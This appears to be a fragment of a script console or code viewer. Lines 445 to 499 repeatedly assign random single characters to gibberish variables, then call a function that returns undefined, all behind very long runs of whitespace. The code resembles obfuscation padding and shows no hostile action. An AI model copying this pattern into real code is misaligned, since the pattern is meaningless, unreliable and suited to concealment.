                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          445
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          pnfsqn = "P";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            446
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            pnfsqn = "s";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              447
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              pnfsqn = "l";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                pnfsqn = "B";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  pnfsqn = "-";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    450
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    qdfpa = "D";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      qdfpa = "U";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        qdfpa = "G";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          qdfpa = "r";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            454
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            qdfpa = "W";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              455
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              qdfpa = "K";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                qdfpa = "B";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  qdfpa = "W";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vqoysebnl = "g";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      459
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      vqoysebnl = "Q";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        vqoysebnl = "z";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          461
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          vqoysebnl = "W";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            vqoysebnl = "v";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              463
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vqoysebnl = "o";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                vqoysebnl = "z";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  vqoysebnl = "U";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    466
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vqoysebnl = "%";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      467
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      edkjgjf = "f";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        edkjgjf = "H";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          edkjgjf = "t";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            470
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            edkjgjf = "K";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              471
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              edkjgjf = "V";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                edkjgjf = "e";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  473
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  edkjgjf = "8";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    474
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    aoblrfg = "V";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      475
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      aoblrfg = "Y";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        aoblrfg = "X";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          477
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          aoblrfg = "o";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            478
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            aoblrfg = "O";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              479
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              aoblrfg = "O";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                aoblrfg = "X";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  481
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  aoblrfg = "a";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    482
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    aoblrfg = "A";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      483
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      aoblrfg = "F";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        btmsoi = "q";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          btmsoi = "A";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            486
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            btmsoi = "O";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              487
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              btmsoi = "N";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                btmsoi = "r";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  489
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  btmsoi = "x";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    490
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    btmsoi = "e";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      491
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      btmsoi = "z";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        btmsoi = "2";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          493
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          qyzap = "S";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            494
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            qyzap = "k";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              qyzap = "k";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                qyzap = "a";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  497
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  qyzap = "e";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    qyzap = "S";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      499
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      wedejlzf ( );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • wedejlzf() ➔ undefined
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Reset < >